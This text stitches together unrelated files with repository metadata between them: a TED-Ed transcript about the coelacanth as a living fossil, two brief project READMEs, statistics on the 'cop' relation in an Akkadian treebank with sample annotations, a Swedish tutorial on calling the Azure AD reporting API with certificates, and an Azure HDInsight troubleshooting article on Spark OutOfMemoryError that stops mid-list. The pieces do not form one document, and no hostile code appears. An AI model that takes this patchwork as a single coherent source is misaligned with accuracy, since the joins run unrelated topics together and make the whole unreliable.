] | null | null | null | cleaned_teded_data/Titles_starting_P_to_Z/The_coelacanth_A_living_fossil_of_a_fish_Erin_Eastwood.md | nadaataiyab/TED-Talks-Nutrition-NLP | 4d7e8c2155e12cb34ab8da993dee0700a6775ff9 | [
"MIT"
] | 18 | 2018-01-24T13:18:51.000Z | 2022-01-09T01:06:02.000Z |
The dead coming back to life sounds scary.
But for scientists, it can be
a wonderful opportunity.
Of course, we're not talking about zombies.
Rather, this particular opportunity
came in the unlikely form
of large, slow-moving fish
called the coelacanth.
This oddity dates back 360 million years,
and was believed to have died out
during the same mass extinction event
that wiped out the dinosaurs
65 million years ago.
To biologists and paleontologists,
this creature was a very old and fascinating
but entirely extinct fish,
forever fossilized.
That is, until 1938 when Marjorie Courtenay-Latimer,
a curator at a South African museum,
came across a prehistoric looking, gleaming
blue fish hauled up at the nearby docks.
She had a hunch that this strange,
1.5 meter long specimen was important
but couldn't preserve it in time
to be studied and had it taxidermied.
When she finally was able to
reach J.L.B. Smith, a local fish expert,
he was able to confirm, at first site,
that the creature was indeed a coelacanth.
But it was another 14 years before
a live specimen was found in the Comoros Islands,
allowing scientists to
closely study a creature
that had barely evolved
in 300 million years.
A living fossil.
Decades later, a second species
was found near Indonesia.
The survival of creatures
thought extinct for so long
proved to be one of the
biggest discoveries of the century.
But the fact that the coelacanth
came back from the dead
isn't all that makes
this fish so astounding.
Even more intriguing is the fact that
genetically and morphologically,
the coelacanth has more in common
with four-limbed vertebrates
than almost any other fish,
and its smaller genome is ideal for study.
This makes the coelacanth a powerful link
between aquatic and land vertebrates,
a living record of their transition from
water to land millions of years ago.
The secret to this transition is in the fins.
While the majority of ocean fish
fall into the category of ray-finned fishes,
coelacanths are part of a much smaller,
evolutionarily distinct group with thicker fins
known as lobe-finned fish.
Six of the coelacanth's fins contain bones
organized much like our limbs,
with one bone connecting
the fin to the body,
another two connecting the bone
to the tip of the fin,
and several small,
finger-like bones at the tip.
Not only are those fins structured
in pairs to move in a synchronized way,
the coelacanth even shares
the same genetic sequence
that promotes limb development
in land vertebrates.
So although the coelacanth
itself isn't a land-walker,
its fins do resemble those
of its close relatives
who first hauled their bodies onto land
with the help of these
sturdy, flexible appendages,
acting as an evolutionary bridge
to the land lovers that followed.
So that's how this prehistoric fish
helps explain the evolutionary movement
of vertebrates from water to land.
Over millions of years,
that transition
led to the spread of all
four-limbed animals, called tetrapods,
like amphibians, birds, and even
the mammals that are our ancestors.
There's even another powerful clue
in that unlike most fish,
coelacanths don't lay eggs,
instead giving birth to live, young pups,
just like mammals.
And this prehistoric fish will continue to
provide us with fascinating information
about the migration of vertebrates
out of the ocean over 300 million years ago.
A journey that ultimately drove
our own evolution, survival and existence.
Today the coelacanth remains the symbol
of the wondrous mysteries that remain
to be uncovered by science.
With so much left to learn about this fish,
the ocean depths and evolution itself,
who knows what other well-kept secrets
our future discoveries may bring to life!
| 32.754386 | 52 | 0.807177 | eng_Latn | 0.999888 |
61c1e1489cec60ac54875ec12070da6510900b50 | 51 | md | Markdown | README.md | monteiroflavio/recipe-api | bb0f19d49a35d949628759cdc11d38a1db9880e1 | [
"MIT"
] | null | null | null | README.md | monteiroflavio/recipe-api | bb0f19d49a35d949628759cdc11d38a1db9880e1 | [
"MIT"
] | null | null | null | README.md | monteiroflavio/recipe-api | bb0f19d49a35d949628759cdc11d38a1db9880e1 | [
"MIT"
] | null | null | null | # recipe-api
Recipe Python API from Udacity course
| 17 | 37 | 0.803922 | eng_Latn | 0.975974 |
61c1e935f75c0529e727b843ed0c0b22fa126722 | 544 | md | Markdown | README.md | he7d3r/maratona-behind-the-code-2020 | 49fc89a593b442d4162e93f5ec230e56df18740a | [
"Apache-2.0"
] | 1 | 2021-01-23T22:15:13.000Z | 2021-01-23T22:15:13.000Z | README.md | he7d3r/maratona-behind-the-code-2020 | 49fc89a593b442d4162e93f5ec230e56df18740a | [
"Apache-2.0"
] | null | null | null | README.md | he7d3r/maratona-behind-the-code-2020 | 49fc89a593b442d4162e93f5ec230e56df18740a | [
"Apache-2.0"
] | null | null | null | # Maratona Behind The Code 2020
Este repositório reúne os códigos e recursos que utilizei para resolver os
oito desafios de negócios propostos na [Maratona Behind The Code](https://maratona.dev/pt) da IBM de 2020.
As soluções propostas garantiram o 239º lugar no ranking geral da maratona no
Brasil, entre as dezenas de milhares de participantes.
A descrição e os arquivos fornecidos como base para cada desafio encontram-se
no subdiretório "desafio" correspondente (que é um submódulo do git, clonado a
partir dos repositórios da maratona).
| 49.454545 | 106 | 0.808824 | por_Latn | 0.997768 |
61c258677819795f04eeab56c0af50b2c3a83ec6 | 4,616 | md | Markdown | treebanks/akk_riao/akk_riao-dep-cop.md | myedibleenso/docs | 4306449b6863a7055a7289a94de010dbcfc11f65 | [
"Apache-2.0"
] | null | null | null | treebanks/akk_riao/akk_riao-dep-cop.md | myedibleenso/docs | 4306449b6863a7055a7289a94de010dbcfc11f65 | [
"Apache-2.0"
] | null | null | null | treebanks/akk_riao/akk_riao-dep-cop.md | myedibleenso/docs | 4306449b6863a7055a7289a94de010dbcfc11f65 | [
"Apache-2.0"
] | null | null | null | ---
layout: base
title: 'Statistics of cop in UD_Akkadian-RIAO'
udver: '2'
---
## Treebank Statistics: UD_Akkadian-RIAO: Relations: `cop`
This relation is universal.
4 nodes (0%) are attached to their parents as `cop`.
4 instances of `cop` (100%) are left-to-right (parent precedes child).
Average distance between parent and child is 14.25.
The following 2 pairs of parts of speech are connected with `cop`: <tt><a href="akk_riao-pos-NOUN.html">NOUN</a></tt>-<tt><a href="akk_riao-pos-PRON.html">PRON</a></tt> (2; 50% instances), <tt><a href="akk_riao-pos-PROPN.html">PROPN</a></tt>-<tt><a href="akk_riao-pos-PRON.html">PRON</a></tt> (2; 50% instances).
~~~ conllu
# visual-style 12 bgColor:blue
# visual-style 12 fgColor:white
# visual-style 1 bgColor:blue
# visual-style 1 fgColor:white
# visual-style 1 12 cop color:blue
1 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 0 root 0:root MAN
2 dannu dannu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 1 amod 1:amod dan-nu
3 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
4 māt mātu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 3 nmod:poss 3:nmod:poss KUR
5 Aššur Aššur PROPN GN Gender=Masc 4 nmod:poss 4:nmod:poss AŠ
6 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
7 kibrāt kibru NOUN N Gender=Fem|NounBase=Bound|Number=Plur 6 nmod:poss 6:nmod:poss kib-rat
8 arba’i _ NUM _ Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 7 nummod 7:nummod _
9 Šamšu Šamaš PROPN DN Case=Nom|Gender=Masc 1 appos 1:appos {d}šam-šu
10 kiššat kiššatu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 9 nmod:poss 9:nmod:poss kiš-šat
11 nišī nišu NOUN N Gender=Fem|Number=Plur 10 nmod:poss 10:nmod:poss UN.MEŠ
12 anāku anāku PRON IP Number=Sing|Person=1 1 cop 1:cop a-na-ku
~~~
~~~ conllu
# visual-style 13 bgColor:blue
# visual-style 13 fgColor:white
# visual-style 1 bgColor:blue
# visual-style 1 fgColor:white
# visual-style 1 13 cop color:blue
1 Adad-nerari Adad-nerari_II PROPN RN Gender=Masc 0 root 0:root {m}{d}IŠKUR-ERIM.TAH₂
2 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos MAN
3 dannu dannu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 2 amod 2:amod dan-nu
4 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
5 māt mātu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 4 nmod:poss 4:nmod:poss KUR
6 Aššur Aššur PROPN GN Gender=Masc 5 nmod:poss 5:nmod:poss aš-šur
7 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
8 kibrāt kibru NOUN N Gender=Fem|NounBase=Bound|Number=Plur 7 nmod:poss 7:nmod:poss kib-rat
9 arba’i _ NUM _ Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 8 nummod 8:nummod _
10 munēr _ NOUN _ Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos _
11 ayyābī ayyābu NOUN N Gender=Masc|NounBase=Suffixal|Number=Plur 10 nmod:poss 10:nmod:poss a-ia-bi-šu
12 šu _ PRON _ Gender=Masc|Number=Sing|Person=3 11 det:poss 11:det:poss _
13 anāku anāku PRON IP Number=Sing|Person=1 1 cop 1:cop ana-ku
14 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos MAN
15 lēʾû lēʾû ADJ AJ Case=Nom|Gender=Masc|Number=Sing 14 amod 14:amod le-ʾu-u₂
16 qabli qablu NOUN N Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 15 nmod:poss 15:nmod:poss MURUB₄
17 sāpin sāpinu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos sa-pi-in
18 ālāni ālu NOUN N Gender=Masc|Number=Plur 17 nmod:poss 17:nmod:poss URU.URU
19 mušahmeṭi _ NOUN _ Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos _
20 šadê šadû NOUN N Gender=Masc|Number=Plur 19 nmod:poss 19:nmod:poss KUR.MEŠ
21 ša ša ADP DET _ 22 case 22:case ša
22 mātāti mātu NOUN N Gender=Fem|NounBase=Free|Number=Plur 20 nmod 20:nmod KUR.KUR.MEŠ
23 anāku anāku PRON IP Number=Sing|Person=1 1 appos 1:appos ana-ku
24 zikaru zikaru NOUN AJ Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos zi-ka-ru
25 qardu qardu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 24 amod 24:amod qar-du
26 mulaʾʾiṭ mulaʾʾiṭu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos mu-la-iṭ
27 ašṭūte wašṭu NOUN N Gender=Masc|NounBase=Suffixal|Number=Plur 26 nmod:poss 26:nmod:poss aš₂-ṭu-te-šu₂
28 šu _ PRON _ Gender=Masc|Number=Sing|Person=3 27 det:poss 27:det:poss _
29 hitmuṭ hitmuṭu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos hi-it-muṭ
30 raggi raggu NOUN N Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 29 nmod:poss 29:nmod:poss rag-gi
31 u u CCONJ CNJ _ 32 cc 32:cc u₃
32 ṣēni ṣēnu NOUN N Case=Gen|Gender=Fem|NounBase=Free|Number=Sing 30 conj 30:conj ṣe-ni
33 anāku anāku PRON IP Number=Sing|Person=1 14 cop 14:cop ana-ku
~~~
| 54.952381 | 312 | 0.766031 | yue_Hant | 0.524212 |
61c261c7cf1fb392f73715c483365f4b7c9ade8c | 6,790 | md | Markdown | articles/active-directory/reports-monitoring/tutorial-access-api-with-certificates.md | gliljas/azure-docs.sv-se-1 | 1efdf8ba0ddc3b4fb65903ae928979ac8872d66e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/reports-monitoring/tutorial-access-api-with-certificates.md | gliljas/azure-docs.sv-se-1 | 1efdf8ba0ddc3b4fb65903ae928979ac8872d66e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/reports-monitoring/tutorial-access-api-with-certificates.md | gliljas/azure-docs.sv-se-1 | 1efdf8ba0ddc3b4fb65903ae928979ac8872d66e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Självstudie för AD repor ting API med certifikat | Microsoft Docs
description: I den här självstudien beskrivs hur du använder Azure AD repor ting-API med autentiseringsuppgifter för certifikat för att hämta data från kataloger utan åtgärder från användaren.
services: active-directory
documentationcenter: ''
author: MarkusVi
manager: daveba
ms.assetid: ''
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: conceptual
ms.subservice: report-monitor
ms.date: 11/13/2018
ms.author: markvi
ms.reviewer: dhanyahk
ms.collection: M365-identity-device-management
ms.custom: has-adal-ref
ms.openlocfilehash: a6699d7a117eee95ba635c8c94ed9b2955f21a7b
ms.sourcegitcommit: a8ee9717531050115916dfe427f84bd531a92341
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 05/12/2020
ms.locfileid: "83196884"
---
# <a name="tutorial-get-data-using-the-azure-active-directory-reporting-api-with-certificates"></a>Självstudie: Hämta data med hjälp av Azure Active Directory rapporterings-API med certifikat
[Azure Active Directory reporting API: er](concept-reporting-api.md) ger programmässig åtkomst till data via en uppsättning REST-baserade API: er. Du kan anropa API: erna från en mängd olika programmeringsspråk och verktyg. Om du vill få åtkomst till Azure AD repor ting-API utan åtgärder från användaren måste du konfigurera åtkomsten till att använda certifikat.
I den här självstudien får du lära dig hur du använder ett test certifikat för att komma åt MS-Graph API för rapportering. Vi rekommenderar inte att du använder test certifikat i en produktions miljö.
## <a name="prerequisites"></a>Krav
1. Kontrol lera att du har en Azure Active Directory-klient med en Premium-licens (P1/P2) för att få åtkomst till inloggnings data. Se [Kom igång med Azure Active Directory Premium](../fundamentals/active-directory-get-started-premium.md) för att uppgradera din Azure Active Directory-version. Observera att om du inte har några aktivitetsdata före uppgraderingen tar det ett par dagar innan data visas i rapporterna när du har uppgraderat till en premiumlicens.
2. Skapa eller växla till ett användar konto i rollen **Global administratör**, **säkerhets administratör**, **säkerhets läsare** eller **rapport läsare** för klienten.
3. Slutför [kraven för att få åtkomst till Azure Active Directory rapporterings-API: et](howto-configure-prerequisites-for-reporting-api.md).
4. Hämta och installera [Azure AD PowerShell V2](https://github.com/Azure/azure-docs-powershell-azuread/blob/master/docs-conceptual/azureadps-2.0/install-adv2.md).
5. Installera [MSCloudIdUtils](https://www.powershellgallery.com/packages/MSCloudIdUtils/). Den här modulen tillhandahåller flera verktygs-cmdlets, däribland:
- ADAL-bibliotek som krävs för autentisering
- Åtkomsttoken från användare, programnycklar och certifikat med ADAL
- Växlingsbara resultat för Graph API-hantering
6. Om det är första gången du använder modulen kör **install-MSCloudIdUtilsModule**, annars importerar du den med hjälp av PowerShell **-kommandot Import-Module** . Din session bör se ut ungefär som den här skärmen: 
7. Använd PowerShell **-kommandot New-SelfSignedCertificate** för att skapa ett test certifikat.
```
$cert = New-SelfSignedCertificate -Subject "CN=MSGraph_ReportingAPI" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
```
8. Använd **export-Certificate** kommandot för att exportera den till en certifikat fil.
```
Export-Certificate -Cert $cert -FilePath "C:\Reporting\MSGraph_ReportingAPI.cer"
```
## <a name="get-data-using-the-azure-active-directory-reporting-api-with-certificates"></a>Hämta data med hjälp av Azure Active Directory Reporting-API:et med certifikat
1. Gå till [Azure Portal](https://portal.azure.com), Välj **Azure Active Directory**och välj sedan **Appregistreringar** och välj ditt program i listan.
2. Välj **certifikat & hemligheter** under **Hantera** avsnitt på program registrerings bladet och välj **Ladda upp certifikat**.
3. Välj certifikat filen i föregående steg och välj **Lägg till**.
4. Anteckna program-ID och tumavtrycket för det certifikat som du precis har registrerat i ditt program. Om du vill hitta tumavtrycket från din program sida i portalen går du till **certifikat & hemligheter** under avsnittet **Hantera** . Tumavtrycket kommer att finnas i listan **certifikat** .
5. Öppna applikations manifestet i den infogade manifest redigeraren och kontrol lera att egenskapen *autentiseringsuppgifter* har uppdaterats med den nya certifikat informationen som visas nedan –
```
"keyCredentials": [
{
"customKeyIdentifier": "$base64Thumbprint", //base64 encoding of the certificate hash
"keyId": "$keyid", //GUID to identify the key in the manifest
"type": "AsymmetricX509Cert",
"usage": "Verify",
"value": "$base64Value" //base64 encoding of the certificate raw data
}
]
```
6. Nu kan du hämta en åtkomsttoken för MS Graph API att använda det här certifikatet. Använd cmdleten **Get-MSCloudIdMSGraphAccessTokenFromCert** från MSCloudIdUtils PowerShell-modulen för att skicka in program-ID och det tumavtryck som du fick från föregående steg.

7. Använd åtkomsttoken i PowerShell-skriptet för att fråga Graph API. Använd cmdleten **Invoke-MSCloudIdMSGraphQuery** från MSCloudIDUtils för att räkna upp inloggningar och directoryAudits-slutpunkten. Denna cmdlet hanterar flera växlade resultat och skickar dessa resultat till PowerShell-pipeline.
8. Fråga directoryAudits-slutpunkten för att hämta gransknings loggarna.

9. Fråga inloggningar-slutpunkten för att hämta inloggnings loggarna.

10. Du kan nu välja att exportera dessa data till en CSV-fil och spara dem i ett SIEM-system. Du kan också ta med skriptet i en schemalagd aktivitet för att regelbundet hämta Azure AD-data från din klientorganisation utan att behöva lagra programnycklar i källkoden.
## <a name="next-steps"></a>Nästa steg
* [Få ett första intryck av rapport-API:er](concept-reporting-api.md)
* [Granska API-referens](https://developer.microsoft.com/graph/docs/api-reference/beta/resources/directoryaudit)
* [Rapport-API-referens för inloggnings aktivitet](https://developer.microsoft.com/graph/docs/api-reference/beta/resources/signin)
| 64.666667 | 463 | 0.781443 | swe_Latn | 0.986203 |
61c47dbc9f434577f266bad1844389b44ba14ffc | 12,739 | md | Markdown | powerbi-docs/visuals/power-bi-visualization-scatter.md | viniciustavanoferreira/powerbi-docs.pt-br | c0183c37fdfb98b82caf5c59c7c6eb3045f10106 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | powerbi-docs/visuals/power-bi-visualization-scatter.md | viniciustavanoferreira/powerbi-docs.pt-br | c0183c37fdfb98b82caf5c59c7c6eb3045f10106 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | powerbi-docs/visuals/power-bi-visualization-scatter.md | viniciustavanoferreira/powerbi-docs.pt-br | c0183c37fdfb98b82caf5c59c7c6eb3045f10106 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Gráficos de dispersão, bolhas e de pontos no Power BI
description: Gráfico de dispersão, gráficos de pontos e gráficos de bolhas no Power BI
author: mihart
ms.reviewer: amac
featuredvideoid: ''
ms.service: powerbi
ms.subservice: powerbi-desktop
ms.topic: how-to
ms.date: 11/21/2019
ms.author: rien
LocalizationGroup: Visualizations
ms.openlocfilehash: b4a5733e0c4b8617dc93edb1e7fe35a0a76a3338
ms.sourcegitcommit: eef4eee24695570ae3186b4d8d99660df16bf54c
ms.translationtype: HT
ms.contentlocale: pt-BR
ms.lasthandoff: 06/23/2020
ms.locfileid: "85238167"
---
# <a name="scatter-charts-bubble-charts-and-dot-plot-charts-in-power-bi"></a>Gráficos de dispersão, gráficos de bolhas e gráficos de pontos no Power BI
[!INCLUDE[consumer-appliesto-nyyn](../includes/consumer-appliesto-nyyn.md)]
[!INCLUDE [power-bi-visuals-desktop-banner](../includes/power-bi-visuals-desktop-banner.md)]
Um gráfico de dispersão sempre tem dois eixos de valor para mostrar um conjunto de dados numéricos em um eixo horizontal e outro conjunto de valores numéricos em um eixo vertical. O gráfico exibe pontos na interseção de um valor numérico de x e y, combinando esses valores em pontos de dados individuais. O Power BI pode distribuir esses pontos de dados de maneira uniforme ou não pelo eixo horizontal. Ele depende dos dados que o gráfico representa.
Você pode definir o número de pontos de dados até um máximo de 10 mil.
## <a name="when-to-use-a-scatter-chart-bubble-chart-or-a-dot-plot-chart"></a>Quando usar um gráfico de dispersão ou de bolhas, um gráfico de pontos
### <a name="scatter-and-bubble-charts"></a>Gráficos de dispersão e bolhas
Um gráfico de dispersão mostra a relação entre dois valores numéricos. Um gráfico de bolhas substitui os pontos de dados por bolhas, com o *tamanho* de bolha representando uma terceira dimensão de dados adicional.

Os gráficos de dispersão são uma ótima opção:
* Para mostrar as relações entre dois valores numéricos.
* Para plotar dois grupos de números como uma série de coordenadas X e Y.
* Para usar em vez de um gráfico de linhas quando desejar alterar a escala do eixo horizontal.
* Para transformar o eixo horizontal em uma escala logarítmica.
* Para exibir os dados da planilha que incluem pares ou conjuntos de valores agrupados.
> [!TIP]
> Em um gráfico de dispersão, é possível ajustar as escalas independentes dos eixos para exibir mais informações sobre os valores agrupados.
* Para mostrar padrões em grandes conjuntos de dados, por exemplo, mostrando exceções, clusters e tendências lineares ou não lineares.
* Para comparar grandes números de pontos de dados sem preocupação com o tempo. Quanto mais dados você incluir em um gráfico de dispersão, melhores serão as comparações que você poderá fazer.
Além do que os gráficos de dispersão podem fazer por você, os gráficos de bolhas são uma ótima opção:
* Se os dados tiverem três séries de dados que contêm um conjunto de valores cada um.
* Para apresentar dados financeiros. Os diferentes tamanhos de bolha são úteis para destacar visualmente os valores específicos.
* Para usar com quadrantes.
### <a name="dot-plot-charts"></a>Gráficos de pontos
Um gráfico de pontos é semelhante a um gráfico de bolhas e um gráfico de dispersão, mas é usado para plotar dados categóricos ao longo do eixo X.

Eles são uma ótima opção se você quiser incluir dados categóricos ao longo do eixo X.
## <a name="prerequisites"></a>Pré-requisitos
Este tutorial usa o [arquivo PBIX de exemplo de Análise de Varejo](https://download.microsoft.com/download/9/6/D/96DDC2FF-2568-491D-AAFA-AFDD6F763AE3/Retail%20Analysis%20Sample%20PBIX.pbix).
1. Na seção superior esquerda da barra de menus, selecione **Arquivo** > **Abrir**
2. Encontre sua cópia do **arquivo PBIX de exemplo de Análise de Varejo**
1. Abra o **arquivo PBIX de exemplo de Análise de Varejo** na exibição de relatório .
1. Selecionar  para adicionar uma nova página.
> [!NOTE]
> Compartilhar seu relatório com um colega do Power BI exige que você tenha licenças de Power BI Pro individuais ou que o relatório seja salvo na capacidade Premium.
## <a name="create-a-scatter-chart"></a>Criar um gráfico de dispersão
1. Inicie em uma página de relatório em branco e, no painel **Campos**, selecione estes campos:
* **Vendas** > **Vendas por pé quadrado**
* **Vendas** > **Percentual de variância total de vendas**
* **Distrito** > **Distrito**

1. No painel **Visualização**, selecione a  para converter o gráfico de colunas de cluster em um gráfico de dispersão.

1. Arraste **Distrito** de **Detalhes** para **Legenda**.
O Power BI exibe um gráfico de dispersão que plota a **% da Variação do Total de Vendas** no eixo Y e as **Vendas por Pé Quadrado** no eixo X. As cores do ponto de dados representam distritos:

Agora vamos adicionar uma terceira dimensão.
## <a name="create-a-bubble-chart"></a>Criar um gráfico de bolhas
1. No painel **Campos**, arraste **Vendas** > **Vendas Deste Ano** > **Valor** para a caixa **Tamanho**. Os pontos de dados são expandidos para volumes proporcionais com o valor de vendas.

1. Focalize uma bolha. O tamanho da bolha reflete o valor das **Vendas Deste Ano**.

1. Para definir o número de pontos de dados a serem mostrados em seu gráfico de bolhas, na seção **Formato** do painel **Visualizações**, expanda o cartão **Geral** e ajuste o **Volume de Dados**.

É possível definir o volume máximo de dados para qualquer número até 10.000. Para garantir um bom desempenho ao definir os números mais altos, faça um teste antes.
> [!NOTE]
> Mais pontos de dados podem significar um tempo de carregamento mais longo. Se você optar por publicar relatórios com limites na extremidade mais elevada da escala, teste seus relatórios em toda a Web e dispositivos móveis também. Você deseja confirmar se o desempenho do gráfico corresponde às expectativas dos usuários.
1. Continue formatando as cores de visualização, os rótulos, os títulos, a tela de fundo e muito mais. Para [melhorar a acessibilidade](../create-reports/desktop-accessibility-overview.md), considere adicionar formas de marcador a cada linha. Para selecionar a forma do marcador, expanda **Formas**, selecione **Forma do marcador** e, em seguida, selecione uma forma.

Altere a forma do marcador para losango, triângulo ou quadrado. Usar uma forma de marcador diferente para cada linha torna mais fácil para os consumidores do relatório diferenciar as linhas (ou áreas) umas das outras.
1. Abra o painel Análise  para adicionar mais informações à sua visualização.
- Adicione uma linha mediana. Selecione **Linha mediana** > **Adicionar**. Por padrão, o Power BI adiciona uma linha mediana para *Vendas por pé quadrado*. Isso não é muito útil, pois podemos ver que há 10 pontos de dados e sabemos que a mediana será criada com cinco pontos de dados em cada lado. Em vez disso, alterne a **Medida** para *Percentual de variância total de vendas*.

- Adicione sombreamento de simetria para mostrar quais pontos têm um valor maior da medida do eixo X em comparação com a medida do eixo Y e vice-versa. Quando você ativa o sombreamento de simetria no painel Análise, o Power BI mostra a tela de fundo do seu gráfico de dispersão simetricamente com base nos limites superior e inferior do eixo atual. Esse é uma maneira muito rápida de identificar qual medida de eixo um ponto de dados favorece, principalmente quando você tem um intervalo de eixo diferente para seu eixo X e Y.
a. Altere o campo **Percentual de variância total de vendas** para **Percentual de margem bruta no ano passado**

b. No painel Análise, adicione **Sombreamento de simetria**. Podemos ver no sombreamento que Meias e Roupa Íntima (a bolha verde na área sombreada em rosa) é a única categoria que favorece a margem bruta em vez das vendas por metros quadrados.

- Continue explorando o painel Análise para descobrir informações interessantes em seus dados.

## <a name="create-a-dot-plot-chart"></a>Criar um gráfico de pontos
Para criar um gráfico de pontos, substitua o campo numérico do **eixo X** por um campo categórico.
No painel **eixo X**, remova **Vendas por pé quadrado** e substitua por **Distrito** > **Gerente de distrito**.

## <a name="considerations-and-troubleshooting"></a>Considerações e solução de problemas
### <a name="your-scatter-chart-has-only-one-data-point"></a>O gráfico de dispersão tem apenas um ponto de dados
O gráfico de dispersão contém apenas um ponto de dados que agrega todos os valores nos eixos X e Y? Ou talvez ele agrega todos os valores em uma linha horizontal ou vertical?

Adicione um campo à caixa **Detalhes** para informar o Power BI como agrupar os valores. O campo deve ser exclusivo para cada ponto que você deseja plotar. Um simples número de linha ou campo de ID serve.

Caso não tenha isso em seus dados, crie um campo que concatene os valores de X e Y em algo exclusivo por ponto:

Para criar um novo campo, [use o Editor de Consultas do Power BI Desktop para adicionar uma Coluna de Índice](../create-reports/desktop-add-custom-column.md) ao conjunto de dados. Em seguida, adicione essa coluna à caixa de visualização **Detalhes**.
## <a name="next-steps"></a>Próximas etapas
Você também pode estar interessado nos seguintes artigos:
* [Amostragem de alta densidade em gráficos de dispersão do Power BI](../create-reports/desktop-high-density-scatter-charts.md)
* [Tipos de visualização no Power BI](power-bi-visualization-types-for-reports-and-q-and-a.md)
* [Dicas para classificar e distribuir gráficos de dados nos relatórios do Power BI](../guidance/report-tips-sort-distribute-data-plots.md)
Mais perguntas? [Experimente a Comunidade do Power BI](https://community.powerbi.com/)
| 66.696335 | 530 | 0.771489 | por_Latn | 0.999254 |
61c6e4d9d36c1b297d2ccc397ff6a50398ecef5b | 5,348 | md | Markdown | articles/hdinsight/spark/apache-spark-troubleshoot-outofmemory-heap.md | keshen-msft/azure-docs | e3b0fb00b27e6d2696acf0b73c6ba05b74efcd85 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-01-03T09:20:59.000Z | 2021-01-03T09:20:59.000Z | articles/hdinsight/spark/apache-spark-troubleshoot-outofmemory-heap.md | keshen-msft/azure-docs | e3b0fb00b27e6d2696acf0b73c6ba05b74efcd85 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/hdinsight/spark/apache-spark-troubleshoot-outofmemory-heap.md | keshen-msft/azure-docs | e3b0fb00b27e6d2696acf0b73c6ba05b74efcd85 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-01-12T15:59:56.000Z | 2022-01-12T15:59:56.000Z | ---
title: OutOfMemoryError exception for Apache Spark in Azure HDInsight
description: OutOfMemoryError exception for Apache Spark in Azure HDInsight
ms.service: hdinsight
ms.topic: troubleshooting
author: hrasheed-msft
ms.author: hrasheed
ms.date: 07/26/2019
---
# Scenario: OutOfMemoryError exception for Apache Spark in Azure HDInsight
This article describes troubleshooting steps and possible resolutions for issues when using Apache Spark components in Azure HDInsight clusters.
## Issue
Your Apache Spark application failed with an OutOfMemoryError unhandled exception. You may receive an error message similar to:
```error
ERROR Executor: Exception in task 7.0 in stage 6.0 (TID 439)
java.lang.OutOfMemoryError
at java.io.ByteArrayOutputStream.hugeCapacity(Unknown Source)
at java.io.ByteArrayOutputStream.grow(Unknown Source)
at java.io.ByteArrayOutputStream.ensureCapacity(Unknown Source)
at java.io.ByteArrayOutputStream.write(Unknown Source)
at java.io.ObjectOutputStream$BlockDataOutputStream.drain(Unknown Source)
at java.io.ObjectOutputStream$BlockDataOutputStream.setBlockDataMode(Unknown Source)
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at org.apache.spark.serializer.JavaSerializationStream.writeObject(JavaSerializer.scala:44)
at org.apache.spark.serializer.JavaSerializerInstance.serialize(JavaSerializer.scala:101)
at org.apache.spark.executor.Executor$TaskRunner.run(Executor.scala:239)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
```
```error
ERROR SparkUncaughtExceptionHandler: Uncaught exception in thread Thread[Executor task launch worker-0,5,main]
java.lang.OutOfMemoryError
at java.io.ByteArrayOutputStream.hugeCapacity(Unknown Source)
...
```
## Cause
The most likely cause of this exception is not enough heap memory. Your Spark application requires enough Java Virtual Machines (JVM) heap memory when running as executors or drivers.
## Resolution
1. Determine the maximum size of the data the Spark application will handle. Make an estimate of the size based on the maximum of the size of input data, the intermediate data produced by transforming the input data and the output data produced further transforming the intermediate data. If the initial estimate is not sufficient, increase the size slightly, and iterate until the memory errors subside.
1. Make sure that the HDInsight cluster to be used has enough resources in terms of memory and also cores to accommodate the Spark application. This can be determined by viewing the Cluster Metrics section of the YARN UI of the cluster for the values of Memory Used vs. Memory Total and VCores Used vs. VCores Total.

1. Set the following Spark configurations to appropriate values. Balance the application requirements with the available resources in the cluster. These values should not exceed 90% of the available memory and cores as viewed by YARN, and should also meet the minimum memory requirement of the Spark application:
```
spark.executor.instances (Example: 8 for 8 executor count)
spark.executor.memory (Example: 4g for 4 GB)
